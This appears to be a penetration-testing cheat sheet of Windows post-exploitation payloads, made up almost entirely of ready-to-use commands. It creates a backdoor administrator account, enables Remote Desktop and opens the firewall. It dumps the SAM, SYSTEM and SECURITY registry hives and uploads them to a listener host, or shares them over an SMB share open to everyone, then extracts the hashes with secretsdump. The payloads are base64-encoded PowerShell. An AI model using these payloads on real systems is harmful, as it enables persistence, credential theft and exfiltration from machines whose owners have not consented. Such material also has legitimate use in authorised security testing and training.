############ Payload/Loot ############ | New admin hackerbeepboop Blabliblou_1 .. code-block:: bash cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1 net user hackerbeepboop Blabliblou_1 /ADD net localgroup Administrators hackerbeepboop /ADD net localgroup "Remote Desktop Users" hackerbeepboop /ADD reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh firewall add portopening TCP 3389 "Remote Desktop" EOF # bgBlAHQAIAB1AHMAZQByACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAAQgBsAGEAYgBsAGkAYgBsAG8AdQBfADEAIAAvAEEARABEAAoAbgBlAHQAIABsAG8AYwBhAGwAZwByAG8AdQBwACAAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAALwBBAEQARAAKAG4AZQB0ACAAbABvAGMAYQBsAGcAcgBvAHUAcAAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACAAVQBzAGUAcgBzACIAIABoAGEAYwBrAGUAcgBiAGUAZQBwAGIAbwBvAHAAIAAvAEEARABEAAoAcgBlAGcAIABhAGQAZAAgACIASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAiACAALwB2ACAAZgBEAGUAbgB5AFQAUwBDAG8AbgBuAGUAYwB0AGkAbwBuAHMAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYAIAAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIgAgAC8AdgAgAGYAQQBsAGwAbwB3AFQAbwBHAGUAdABIAGUAbABwACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmACAACgBuAGUAdABzAGgAIABmAGkAcgBlAHcAYQBsAGwAIABhAGQAZAAgAHAAbwByAHQAbwBwAGUAbgBpAG4AZwAgAFQAQwBQACAAMwAzADgAOQAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACIACgA= Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "BlAHQAIAB1AHMAZQByACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAAQgBsAGEAYgBsAGkAYgBsAG8AdQBfADEAIAAvAEEARABEAAoAbgBlAHQAIABsAG8AYwBhAGwAZwByAG8AdQBwACAAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAALwBBAEQARAAKAG4AZQB0ACAAbABvAGMAYQBsAGcAcgBvAHUAcAAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACAAVQBzAGUAcgBzACIAIABoAGEAYwBrAGUAcgBiAGUAZQBwAGIAbwBvAHAAIAAvAEEARABEAAoAcgBlAGcAIABhAGQAZAAgACIASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAiACAALwB2ACAAZgBEAGUAbgB5AFQAUwBDAG8AbgBuAGUAYwB0AGkAbwBuAHMAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYAIAAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIgAgAC8AdgAgAGYAQQBsAGwAbwB3AFQAbwBHAGUAdABIAGUAbABwACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmACAACgBuAGUAdABzAGgAIABmAGkAcgBlAHcAYQBsAGwAIABhAGQAZAAgAHAAbwByAHQAbwBwAGUAbgBpAG4AZwAgAFQAQwBQACAAMwAzADgAOQAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACIACgA=" | | dump SAM SYSTEM SECURITY .. code-block:: powershell cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1 $d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_} EOF # JABkAGkAcgA9ACIAJABlAG4AdgA6AFQARQBNAFAAXAAiADsAJQB7ACIAcwBhAG0AIgA7ACIAcwB5AHMAdABlAG0AIgA7ACIAcwBlAGMAdQByAGkAdAB5ACIAfQB8ACUAewByAGUAZwAgAHMAYQB2AGUAIABoAGsAbABtAFwAJABfACAAJABkAGkAcgAkAF8AfQAKAA== | | dump SAM SYSTEM SECURITY, upload, delete .. code-block:: powershell cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1 $u="http://192.168.1.163:8080";$d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_;(New-Object System.Net.WebClient).UploadFile("$u","$d$_");clc "$d$_";rm "$d$_"} EOF # JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA # cd $(mktemp -d) && git clone https://gitlab.com/charles.gargasson/PostDL . && sudo python3 postdl.py --ip 0.0.0.0 -p 8080 & Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA" | | dump SAM SYSTEM SECURITY, share them with a temporary SMB share (.. you need an user if passwordless access is disable, but you can change this setting) .. code-block:: powershell mkdir "$env:TEMP\S";New-SmbShare -Name S -Path "$env:TEMP\S" -Temporary -FullAccess ([System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')).Translate([System.Security.Principal.NTAccount]).Value $d="$env:TEMP\S\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_} # Get-SmbShare # Remove-SmbShare -Name S -Force | | Read sam system security .. code-block:: bash secretsdump.py -sam /tmp/share/sam -system /tmp/share/system -security /tmp/share/security local -history